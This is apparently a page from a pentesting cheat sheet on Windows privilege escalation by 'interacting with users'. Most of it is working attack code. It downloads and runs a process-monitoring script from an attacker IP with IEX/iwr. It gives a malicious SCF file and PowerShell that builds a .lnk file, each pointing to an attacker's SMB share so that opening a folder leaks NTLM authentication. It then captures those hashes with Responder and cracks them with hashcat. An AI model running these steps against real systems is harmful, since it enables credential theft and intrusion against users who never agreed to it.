Interacting with Users

Traffic Capture

Process Command Lines

Monitoring for Process Command Lines

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

Running Monitor Script on Target Host

IEX (iwr 'http://10.10.10.205/procmon.ps1')

Vulnerable Services

Malicious SCF File

@Inventory.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Starting Responder

sudo responder -wrf -v -I tun0

Cracking NTLMv2 Hash with Hashcat

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Capturing Hashes with a Malicious .lnk File

Lnkbomb

Generating a Malicious .lnk File

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

PreviousHyper-V Administrators NextKernel Exploits

Last updated 3 months ago

hashtagTraffic Capture

hashtagProcess Command Lines

hashtagMonitoring for Process Command Lines

hashtagRunning Monitor Script on Target Host

hashtagVulnerable Services

hashtagSCF on a File Share

hashtagMalicious SCF File

hashtagStarting Responder

hashtagCracking NTLMv2 Hash with Hashcat

hashtagCapturing Hashes with a Malicious .lnk File

hashtagGenerating a Malicious .lnk File

Traffic Capture

Process Command Lines

Monitoring for Process Command Lines

Running Monitor Script on Target Host

Vulnerable Services

SCF on a File Share

Malicious SCF File

Starting Responder

Cracking NTLMv2 Hash with Hashcat

Capturing Hashes with a Malicious .lnk File

Generating a Malicious .lnk File